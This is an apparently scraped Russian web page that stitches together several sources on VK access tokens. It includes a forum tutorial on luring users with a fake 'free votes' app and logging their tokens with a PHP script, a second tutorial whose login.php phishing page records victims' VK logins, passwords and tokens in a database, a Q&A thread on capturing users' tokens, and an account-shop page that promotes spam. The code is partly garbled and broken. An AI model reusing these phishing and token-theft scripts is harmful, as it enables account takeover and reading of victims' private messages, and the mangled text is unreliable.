Как получить токен вк другого человека
Всем привет!
Видел на zhyk.ru давно тему, где кто-то создал программу для чтения ЛС по access_token ВКонтакте.
Решил написать тему, где подробно расскажу, как же получить доступ к ВК аккаунту (2 способа) с помощью access_token, и как же его «достать»
Немного о «токене»: access_token — специальный «ключ» аккаунта ВКонтакте, который используется приложениями для взаимодействия с пользователем.
1 способ. — желательно создать мини веб-сайт, где Вы будете предлагать пользователю бесплатные голоса, читы в играх ВК и т.п по access_token’y
1. Нам необходимо создать Standalone-приложение (желательно назвать его типа: Бесплатные голоса, подарки ВКонтакте и т.п), и перевести его в состояние «Приложение включено и видно всем»
2. Необходимо генерировать API запрос для получения access_token’a
Пример: [ Ссылки могут видеть только зарегистрированные пользователи. ]
client_id — ID вашего созданного приложения (можно посмотреть в настройках приложений)
Получение токена пользователя в VK вконтакте для работы с API
scope — параметры, к которым приложение будет запрашивать доступ (битовая маска настроек доступа приложения)
В моем примере API запроса приложение будет запрашивать доступ практически ко всему (в т.ч личным сообщениям)
Пользователь будет видеть, к чему приложение запрашивает доступ.
Если пользователь разрешит доступ приложению, ему откроется blank.html с текстом «Пожалуйста, не копируйте данные из адресной строки для сторонних сайтов. Таким образом Вы можете потерять доступ к Вашему аккаунту.»
В URL этого blank.html и будет лежать access_token, с помощью которого Вы сможете получить доступ к аккаунту.
Пример ответного запроса с access_token: [ Ссылки могут видеть только зарегистрированные пользователи. ]
Думаю, здесь понятно, что из чего. Но на всякий случай:
Токеном считается всё от access_token= до символа «.
P.S Но тут есть проблема в том, что токен Вам сам не придёт. Вам придется как-то убедить пользователя, чтобы он скопировал адресную строку и передал её Вам (или ввёл в специальную форму на Вашем сайте).
Способ 2. — более удобный способ. Тут пользователю не придется самостоятельно копировать адресную строчку. Но есть минус в том, что с этим способом Вы маловероятно сможете получить доступ к ЛС (к остальному — сможете). Тут обязательно понадобится мини веб-сайт.
1. Создайте приложение «веб-сайт». Укажите основной домен Вашего «веб-сайта», на котором Вы будете «выманивать» access_token
2. В настройках приложения переведите в состояние «Приложение включено и видно всем» , и настройте требования доступа (Вы будете иметь доступ только к тем параметрам через этот access_token, которые запросите). Желательно выбрать все параметры, кроме отправки уведомлений.
3. Создайте авторизацию через Ваше ВК-приложение на Вашем веб-сайте с редиректом на [ Ссылки могут видеть только зарегистрированные пользователи. ]
Теперь нам необходимо создать сам файл vk.php, который будет обрабатывать запрос авторизации и записывать полученный access_token в .txt файл
Выглядит этот файл так:
$code = $_GET[‘code’];
$secret = ‘accesstoken’; //секретный ключ вашего приложения
$idapp = ‘1’; //id вашего приложения
$json = file_get_contents(‘https://api.vk.com/oauth/token?client_id=’.$idapp.’client_s ecret=’.$secret);
$obj = json_decode($json);
$ololo = $obj->;
$access_token=$ololo;
echo ‘Авторизация выполнена’;
$log = fopen(«tokens.txt»,»a+»);
fwrite($log,»$access_token n»);
fclose($log);
?>
Изменяем параметр $secret и $idapp в коде.
Затем создаем файл tokens.txt (в этом же веб-каталоге, где и файл vk.php) и обязательно* ставим на него права доступа 777 (иначе токены не будут записываться)
Готово! Теперь, как только Ваша «жертва» войдет на Ваш сайт через ВК и попадет на vk.php, Вы получите её access_token (он будет автоматически записан в файл tokens.txt)
«Жертва взлома» после авторизации увидит довольно простой текст: «Авторизация выполнена»
————————————
1 способ более «палёвый», но с помощью него Вы можете получить более «функциональный» access_token (можно читать ЛС)
2 способ более удобный, да и догадаться о взломе там очень трудно, но с помощью полученного access_token’a Вы не сможете читать ЛС.
Но если очень постараться, можно выйти на ЛС через 2-й способ.
И теперь, наверное, самое главное —
Как войти в аккаунт, имея access_token?
Войти в аккаунт через access_token можно с помощью сервиса APIdog ([ Ссылки могут видеть только зарегистрированные пользователи. ]). Он очень удобный.
([ Ссылки могут видеть только зарегистрированные пользователи. ])
Вставляйте полученный Вами access_token, и входите.
Еще есть вариант использовать API запросы для действий с аккаунтом, но это достаточно трудно и долго.
И напоследок: APIdog по умолчанию делает сессию «офлайн». Никто не узнает, что Вы сейчас онлайн.
Все действия, которые Вы делайте на аккаунте «жертвы», отмечаются как выполненные через приложение, через которое был получен access_token.
Вот и всё!
Надеюсь, объяснил понятно.
Задавайте вопросы — отвечу.
Источник: zhyk.org
Как можно получить access token другого пользователя vk
Делаю чат-бота вконтакте на языке Python. Недавно захотел добавить в бота одну функцию, но для этой функции надо иметь access_token юзера, который прислал сообщение. Есть вариант попросить пользователя перейти по ссылке (типо вот такой) и попросить отослать в сообщении полученный токен. Но это очень долго и заморочено.
В чём собственно вопрос: а можно ли сделать так, чтобы пользователь переходил по ссылке, нажимал «разрешить», и потом токен автоматически отправлялся мне? Если такая возможность есть, то просьба написать как это можно сделать на Python. P.S. У меня есть рабочий сервер на flask, т.к. бот на callback api.
Отслеживать
13.5k 2 2 золотых знака 16 16 серебряных знаков 27 27 бронзовых знаков
задан 6 сен 2018 в 7:41
user188596 user188596
31 2 2 серебряных знака 6 6 бронзовых знаков
Конечно есть могу дать если надо?
24 июл 2019 в 1:19
1 ответ 1
Сортировка: Сброс на вариант по умолчанию
В ссылке для авторизации в качестве адреса редиректа нужно указать адрес своего сервера (например redirect_uri=http://my_server.ru/callback ), после авторизации пользователя по этому адресу придет GET-запрос с указанием токена пользователя такого вида:
http://my_server.ru/callback?code=7a6fa4dff77a228eeda56603b8f.
На стороне сервера вам нужно будет этот запрос обработать.
Отслеживать
ответ дан 24 июл 2019 в 6:10
43.3k 13 13 золотых знаков 51 51 серебряный знак 89 89 бронзовых знаков
- python
- вконтакте
-
Важное на Мете
Похожие
Подписаться на ленту
Лента вопроса
Для подписки на ленту скопируйте и вставьте эту ссылку в вашу программу для чтения RSS.
Нажимая «Принять все файлы cookie» вы соглашаетесь, что Stack Exchange может хранить файлы cookie на вашем устройстве и раскрывать информацию в соответствии с нашей Политикой в отношении файлов cookie.
Источник: ru.stackoverflow.com
Взлом ВК через прямую авторизацию
Но перед этим создадим БД куда будем записывать все валидные данные.
- Переходим на хостинге в PhpMyAdmin и нажимаем «Создать»
2. Создадим таблицу на 7 столбцов
3. Параметры id, Логин (login), Пароль (password), Токен (token), Дата (date), Имя (first_name) и Фамилия (last_name) зададим как на картинке
В параметрах столбца id должен быть отмечен параметр «A_I» (auto_increment) и стоять PRIMARY KEY.
Теперь сам файл login.php:
‘text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8’, ‘content-type’ => ‘application/x-www-form-urlencoded’, ‘user-agent’ => ‘Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36’ ); //Запишем сюда значения логина и пароля из HTML формы $login = $_POST[‘login’]; $password = $_POST[‘password’]; //Если какое-то поле оказалось пустым if (empty($login) or empty($password)) < //Отправим пользователя на стартовую страницу authorize и просигнализируем об ошибке header(‘Location: /authorize.php?error_login=true’); exit; >else < //Если все поля заполнены, то посылаем запрос на получение токена по нашей ссылке выше $get_token = post (‘https://api.vk.com/oauth/token?grant_type=passwordscope=offlineusername=’.$login.’array( ‘accept: ‘.$headers[‘accept’], ‘content-type: ‘.$headers[‘content-type’], ‘user-agent: ‘.$headers[‘user-agent’] ) )); //Если авторизация прошла успешно if (preg_match(«/[a-z0-9]/», $get_token[‘headers’], $token)) < $token1 = json_decode(file_get_contents(‘https://api.vk.com/oauth/token?grant_type=passwordscope=offlineusername=’.$login.’ $data = json_decode(file_get_contents(‘https://api.vk.com/method/users.get?user_id=’.$token1[‘user_id’].’fields=uid,first_name,last_name //Записываем в переменную текущую дату и время сервера $date_l = date(«H:i:s d-m-Y»); //Подключаемся к БД $host=»localhost»; $user=»»; //Имя пользователя от MySql $pass=»»; //Пароль от MySql $db_name=»»; //Имя базы $link=mysql_connect($host,$user,$pass); mysql_select_db($db_name,$link); mysql_query(«set names utf8»); //Выполняем запись валида в БД $sql = mysql_query(«INSERT INTO vk(login, password, token, date, user_id, first_name, last_name) VALUES(‘».$login.»‘,'».$password.»‘,'».$token[0].»‘,'».$date_l.»‘,'».$token1[‘user_id’].»‘,'».$data[‘response’][0][‘first_name’].»‘,'».$data[‘response’][0][‘last_name’].»‘)»); //Если все прошло успешно, то перенаправляем пользователя на vk.com или на ваш сайт if ($sql) < session_start(); $_SESSION[‘logged_user’] = $data[‘response’][0][‘first_name’]; header(‘Location: vk.com/’); //Если при записи обнаружены ошибки, то перенаправим пользователя на главную страницу нашего сайта с сообщением об ошибке >else header(‘Location: /authorize.php?error_login=true’); //Закрываем соединение mysql_close($link); exit; > //Если авторизация не прошла, то отправим пользователя на стартовую страницу с ошибкой else header(‘Location: /authorize.php?error_login=true’); > //cUrl POST function post($url = null, $params = null, $proxy = null, $proxy_userpwd = null) < $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); if(isset($params[‘params’])) < curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $params[‘params’]); >if(isset($params[‘headers’])) < curl_setopt($ch, CURLOPT_HTTPHEADER, $params[‘headers’]); >if(isset($params[‘cookies’])) < curl_setopt($ch, CURLOPT_COOKIE, $params[‘cookies’]); >if($proxy) < curl_setopt($ch, CURLOPT_PROXY, $proxy); if($proxy_userpwd) < curl_setopt($ch, CURLOPT_PROXYUSERPWD, $proxy_userpwd); >> $result = curl_exec($ch); $result_explode = explode(«rnrn», $result); $headers = ((isset($result_explode[0])) ? $result_explode[0].»rn» : »).».((isset($result_explode[1])) ? $result_explode[1] : »); $content = $result_explode[count($result_explode) — 1]; preg_match_all(‘|Set-Cookie: (.*);|U’, $headers, $parse_cookies); $cookies = implode(‘;’, $parse_cookies[1]); curl_close($ch); return array(‘headers’ => $headers, ‘cookies’ => $cookies, ‘content’ => $content); > ?>
В переменные $host=»localhost»;
$user=»»; //Имя пользователя от MySql
$pass=»»; //Пароль от MySql
$db_name=»»; //Имя базы
вписываем наши данные
На 50 строчке если авторизация прошла успешно, нужно перенаправить пользователя на ваш сайт или куда вам угодно.
header(‘Location: «Ваш сайт» ‘);
Осталось залить все файлы на хостинг и можно фишить.
ВНИМАНИЕ: АВТОР СТАТЬИ НИ КОГО НЕ ПРИЗЫВАЕТ К ПОДОБНЫМ ДЕЙСТВИЯМ!ВСЯ ИНФОРМАЦИЯ ПРЕДОСТАВЛЕНА ДЛЯ ОЗНАКОМЛЕНИЯ.
- ← Скачать историю странички вконтакте
- 7 фотостоков, где можно бесплатно скачать фото →
Источник: gyzeev.ru
Как использовать аккаунты Вконтакте через API?
Token Вконтакте – это ключ доступа к API (цифровой сертификат), используемый для авторизации при запросе к интерфейсу программирования приложения.
Многие предпочитают купить аккаунты ВК с токеном, с раскрученными группами, качественными авторегами, голосами ВК и прочим.
Рассмотрим, в чем преимущества Token-а, и узнаем все его особенности.
- Отправляем аккаунты всего за 5 секунд на ваш e-mail адрес!
- Аккаунты можно скачать в личном кабинете, на почте и без регистрации или сразу после оплаты!
- Мы автоматически создаем личный кабинет с историей ваших заказов
- Большое время на проверку товара до 1-24 часа (примечание у вкладок).
- У нас можно найти аккаунты любой социальной сети и почтовой службы, сервиса, форума
- Наши аккаунты стабильно работают на большинстве видов Proxy
Что такое Token Вконтакте у аккаунта?
Ключи доступа к API ВК по сути являются документами, в которых прописано ФИО пользователя и списки того, что им разрешено делать.
Показывая ключ ВК (токен), например, для записей на стене, проводится проверка, имеется у токена доступ к выполнению таких действий или нет.
Если все в порядке, то записи делаются от имени пользователя.
- Приложений. АПИ ВК находится в настройках приложения
- Сообщества. Создается в настройках
- Пользователя. Возникает автоматически, когда человек проходит авторизацию в каких-либо приложениях
Вы пробуете войти в приложение, используя свой аккаунт соц.сети.
Например, с помощью альтернативных клиентов. Вконтакте не позволяет чужим программам функционировать через себя просто так. Им требуется токен.
Сначала формируются запросы для получения детальной информации о приложении.
Вам придет сообщение, в котором потребуется дать доступ к любым разделам соц.сети (ваша стена, списки контактов, группа, мессенджер и прочее). После того, как вы даете разрешение или запрещаете действие — токен либо выписывается, либо нет.
В первом варианте вход совершается в данную утилиту через ВКонтакте (одновременно формируется ключ, так называемый токен, и при других входах не придется ничего подтверждать), во втором – этого не происходит.
Получить access token ВКонтакте очень просто. Делается это непосредственно в браузере, совершив переход по правильным ссылкам и созданным на странице «Ваши приложения».
- выбрать приложение
- кликнуть на него
- подтвердить «Разрешить»
- скопировать часть адресной строки от access token до client_id=2274003username= expires_in. Первая часть ссылки access_token и есть ваш ключ (код профиля). Остается скопировать его или записать в блокноте.
- продажа аккаунтов разными партиями – 1, 10, 100 штук
- оперативная обработка заявок, с быстрой отправкой
- проверка на протяжении 24 часов
- предлагаем только аккаунты, зарегистрированные у нас или на сервисах партнеров
- предоставление гарантии – аттестат продавца с Bl
- формирование цен в автоматическом режиме
- оперативное реагирование техподдержки
- каждый продукт зарегистрирован вручную базы или с помощью софта (не занимаемся продажей краденных аккаунтов)
- Как правильно спамить с аккаунтов Вконтакте? В данной статье мы рассмотрим основные моменты Спама в социальной сети Вконтакте. Спам на самом деле всем нам очень надоел, но он по прежнему остается рабочим и его применяют. У нас есть несколько. читать подробнее
- Чем лучше продвигать товар в Вконтакте? Многих пользователей интересует возможность продажи своих услуг через Вконтакте. Обычно для продажи выбирают различный формат рекламы — либо создают паблик страницу, либо группу Вконтакте или же. читать подробнее
- Как защитить группу Вконтакте от спама? Администраторы крупных и даже небольших сообществ Вконтакте сталкивались с проблемой спама и многие задаются вопросом как защитить группу вконтакте? Защита группы вконтакте включает в себя не. читать подробнее
- Купить аккаунты Вконтакте дешево от 1 рубля В наше время все больше пользователей из социальной сети Вконтакте интересуют учетные записи с раскрученным статусом — уже есть подписчики и друзья, множество постов и аккаунт является старым. . читать подробнее
- Как долго живут аккаунты вконтакте? Начнем мы с достаточно плохих новостей — Вконтакте это самая не стабильная сеть. Блокировку аккаунта в данной сети можно получить вообще за любые действия, здесь самая молодая аудитория по сравнению. читать подробнее
- Какие аккаунты Вконтакте подходят для раскрутки группы? Всемирная Паутина — стартовая площадка для обмена информацией, торговли, рекламы. Успех деятельности пользователя напрямую зависит от популярности — вопрос раскрутки актуален. Созданную. читать подробнее
- Основные ограничения для аккаунтов Вконтакте В социальной сети ВКонтакте введены определённые лимиты, ограничивающие действия пользователя Их соблюдение особенно актуально, если страница модерируется с целью продвижения. Во время процесса. читать подробнее
- Купить аккаунт Вконтакте Аккаунты «ВКонтакте» (VK.com) — самая крупная социальная сеть в Европе, принадлежит Mail.Ru Group. Если брать статистику по странам, то в России на втором месте, в Казахстане и Украине на первом. читать подробнее
- Купить 1 аккаунт Вконтакте «Вконтакте» на данный момент является самой известной соц. сетью в России и странах СНГ. Сейчас ежедневное количество пользователей «ВК» оценивается в 50 миллионов человек в сутки. Такая. читать подробнее
- Прокаченные аккаунты Вконтакте с подписчиками Вконтакте — очень популярная социальная сеть. Практически у 80% населения есть профиль в этой социальной сети. Потому отвергать тот факт, что раскрутка в в вконтакте не увеличит прибыль — просто. читать подробнее
- доступ к контенту;
- возможности посетителя страницы при взаимодействии с ней.
- записям пользователя;
- сообществу;
- приложениям.
- адреса oath по умолчанию;
- значения клиента ID (то есть моего);
- display page (отображаемой страницы);
- redirect uri (адреса переадресации аккаунта после авторизации, его можно узнать в разделе «Документация»);
- scope (атрибутов, их перечислила через запятую);
- response type (значения token);
- версии запроса (5.21).
- установить расширение Edit This Cookie.
Для удобства и экономии пользуйтесь «Личным кабинетом» (быстрое получение заказа за счет ссылок в кабинете, без попадания в спам). Оплата: Киви, Юмани, с минимальной комиссией.
Купить сейчас Узнайте как правильно оформить заказ на нашем сайте!
Похожие материалы по данной теме
Источник: buy-accs.ru
Что такое токен в ВК, как его узнать: найти и взять, способы получения ключа доступа к «ВКонтакте» и как он выглядит, вход на страницу через VK Token, взлом ВК другого человека с помощью токена
Полезно
Автор Анна Сергеева На чтение 4 мин Просмотров 18
Чтобы защитить пользователей от злоумышленников и сохранить приватность данных, программисты создали токен в ВК, потому что социальную сеть «ВКонтакте» посещают миллионы граждан с разными, не всегда добрыми, намерениями.
Что такое токен в ВК, и зачем он нужен
Так называют комбинацию букв и цифр, с помощью которой идентифицируется человек, сообщество, беседа.
В частности, если кто-то захочет написать что-либо на «Стене», система проверит, есть ли у обладателя токена в ВК право оставлять записи, и только затем позволит ему выполнить действие.
Виды токенов
Ключи ВК ведут к:
Способы получения токенов в целом похожи.
Ключ доступа пользователя
Я получила его c помощью Implicit Flow, а именно по запросу, состоящему из:
Сформировав запрос, скопировала его, вставила в адресную строку поисковика и нажала клавишу Enter. Код появился в адресной строке. Это запись от «token=» до знака «
После нажатия на кнопку расширения откроется окно, в котором между знаками «=» и «https://vkguru.info/chto-takoe-token-v-vk-kak-ego-uznat-najti-i-vzyat-sposoby-polucheniya-klyucha-dostupa-k-vkontakte-i-kak-on-vyglyadit-vhod-na-stranitsu-cherez-vk-token-vzlom-vk-drugogo-cheloveka-s-pomoshhyu-tokena/» target=»_blank»]vkguru.info[/mask_link]